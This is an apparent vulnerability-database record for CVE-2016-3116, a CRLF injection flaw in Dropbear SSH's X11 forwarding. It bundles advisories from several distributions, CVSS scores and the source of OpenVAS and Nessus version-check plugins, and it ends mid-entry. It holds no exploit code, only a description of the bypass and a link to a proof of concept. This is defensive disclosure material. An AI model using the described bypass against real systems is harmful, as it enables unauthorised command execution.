ID FEDORA:3F1086090E78 Type fedora Reporter Fedora Modified 2016-03-24T00:05:17
Description
Dropbear is a relatively small SSH server and client. It's particularly use ful for "embedded"-type Linux (or other Unix) systems, such as wireless routers.
{"cve": [{"lastseen": "2021-02-02T06:28:05", "description": "CRLF injection vulnerability in Dropbear SSH before 2016.72 allows remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data.\n<a href=\"https://cwe.mitre.org/data/definitions/93.html\">CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')</a>", "edition": 6, "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-03-22T10:59:00", "title": "CVE-2016-3116", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3116"], "modified": "2016-12-03T03:26:00", "cpe": ["cpe:/a:dropbear_ssh_project:dropbear_ssh:2015.71"], "id": "CVE-2016-3116", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3116", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:dropbear_ssh_project:dropbear_ssh:2015.71:*:*:*:*:*:*:*"]}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3116"], "description": "Dropbear is a relatively small SSH server and client. It's particularly use ful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers. ", "modified": "2016-03-23T22:29:21", "published": "2016-03-23T22:29:21", "id": "FEDORA:E5E60608F463", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: dropbear-2016.72-1.fc23", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3116"], "description": "Dropbear is a relatively small SSH server and client. It's particularly use ful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers. ", "modified": "2016-03-27T00:49:06", "published": "2016-03-27T00:49:06", "id": "FEDORA:B8CC460AA79C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: dropbear-2016.72-1.fc24", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3116"], "description": "\nMatt Johnson reports:\n\nValidate X11 forwarding input. Could allow bypass of\n\t authorized_keys command= restrictions\n\n", "edition": 4, "modified": "2016-03-11T00:00:00", "published": "2016-03-11T00:00:00", "id": "8EB78CDC-E9EC-11E5-85BE-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/8eb78cdc-e9ec-11e5-85be-14dae9d210b8.html", "title": "dropbear -- authorized_keys command= bypass", "type": "freebsd", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:35:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-03-24T00:00:00", "id": "OPENVAS:1361412562310807729", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807729", "type": "openvas", "title": "Fedora Update for dropbear FEDORA-2016-332491", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dropbear FEDORA-2016-332491\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807729\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-24 06:14:24 +0100 (Thu, 24 Mar 2016)\");\n script_cve_id(\"CVE-2016-3116\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for dropbear FEDORA-2016-332491\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dropbear'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"dropbear on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-332491\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179261.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"dropbear\", rpm:\"dropbear~2016.72~1.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-03-24T00:00:00", "id": "OPENVAS:1361412562310807732", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807732", "type": "openvas", "title": "Fedora Update for dropbear FEDORA-2016-40", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dropbear FEDORA-2016-40\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807732\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-24 06:14:25 +0100 (Thu, 24 Mar 2016)\");\n script_cve_id(\"CVE-2016-3116\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for dropbear FEDORA-2016-40\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dropbear'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"dropbear on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-40\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179269.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"dropbear\", rpm:\"dropbear~2016.72~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "description": "Mageia Linux Local Security Checks mgasa-2016-0113", "modified": "2019-03-14T00:00:00", "published": "2016-03-17T00:00:00", "id": "OPENVAS:1361412562310131270", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131270", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0113", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0113.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131270\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-03-17 16:02:33 +0200 (Thu, 17 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0113\");\n script_tag(name:\"insight\", value:\"Updated dropbear package fixes security vulnerability: Missing validation of X11 forwarding input could allow bypassing of authorized_keys command= restrictions (CVE-2016-3116).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0113.html\");\n script_cve_id(\"CVE-2016-3116\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0113\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"dropbear\", rpm:\"dropbear~2014.66~1.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-03-10T18:56:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "description": "This host is installed with Dropbear SSH\n and is prone to crlf injection vulnerability.", "modified": "2020-03-09T00:00:00", "published": "2016-04-06T00:00:00", "id": "OPENVAS:1361412562310807740", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807740", "type": "openvas", "title": "Dropbear SSH CRLF Injection Vulnerability", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:dropbear_ssh_project:dropbear_ssh\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807740\");\n script_version(\"2020-03-09T10:54:00+0000\");\n script_cve_id(\"CVE-2016-3116\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-03-09 10:54:00 +0000 (Mon, 09 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-04-06 16:24:50 +0530 (Wed, 06 Apr 2016)\");\n script_name(\"Dropbear SSH CRLF Injection Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Dropbear SSH\n and is prone to crlf injection vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to invalid processing\n of 'X11' forwarding input.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote authenticated users to inject commands to xauth..\");\n\n script_tag(name:\"affected\", value:\"Dropbear SSH before 2016.72\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Dropbear SSH version 2016.72 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://matt.ucc.asn.au/dropbear/CHANGES\");\n script_xref(name:\"URL\", value:\"https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_dropbear_ssh_detect.nasl\");\n script_mandatory_keys(\"dropbear/installed\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!sshPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!sshVer = get_app_version(cpe:CPE, port:sshPort)){\n exit(0);\n}\n\nif(version_is_less(version:sshVer, test_version:\"2016.72\"))\n{\n report = report_fixed_ver(installed_version:sshVer, fixed_version:\"2016.72\");\n security_message(port:sshPort, data:report);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:20", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3116"], "description": "### Background\n\nDropbear is a relatively small SSH server and client.\n\n### Description\n\nA CRLF injection vulnerability in Dropbear SSH allows remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data. \n\n### Impact\n\nA remote authenticated user could execute arbitrary code with the privileges of the process. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Dropbear users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/dropbear-2016.73\"", "edition": 1, "modified": "2016-07-20T00:00:00", "published": "2016-07-20T00:00:00", "id": "GLSA-201607-08", "href": "https://security.gentoo.org/glsa/201607-08", "type": "gentoo", "title": "Dropbear: Privilege escalation", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2021-01-12T10:14:23", "description": "new version\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-08-02T00:00:00", "title": "Fedora 23 : dropbear (2016-6de0b19b3b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-08-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:dropbear", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-6DE0B19B3B.NASL", "href": "https://www.tenable.com/plugins/nessus/92670", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-6de0b19b3b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92670);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3116\");\n script_xref(name:\"FEDORA\", value:\"2016-6de0b19b3b\");\n\n script_name(english:\"Fedora 23 : dropbear (2016-6de0b19b3b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new version\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-6de0b19b3b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"dropbear-2016.74-1.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:14:06", "description": "CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-24T00:00:00", "title": "Fedora 23 : dropbear-2016.72-1.fc23 (2016-332491de28)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:dropbear", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-332491DE28.NASL", "href": "https://www.tenable.com/plugins/nessus/90129", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-332491de28.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90129);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3116\");\n script_xref(name:\"FEDORA\", value:\"2016-332491de28\");\n\n script_name(english:\"Fedora 23 : dropbear-2016.72-1.fc23 (2016-332491de28)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1316826\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179261.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c0be1420\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"dropbear-2016.72-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:14:11", "description": "CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-24T00:00:00", "title": "Fedora 22 : dropbear-2016.72-1.fc22 (2016-40a657cee1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:dropbear", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-40A657CEE1.NASL", "href": "https://www.tenable.com/plugins/nessus/90132", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-40a657cee1.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90132);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3116\");\n script_xref(name:\"FEDORA\", 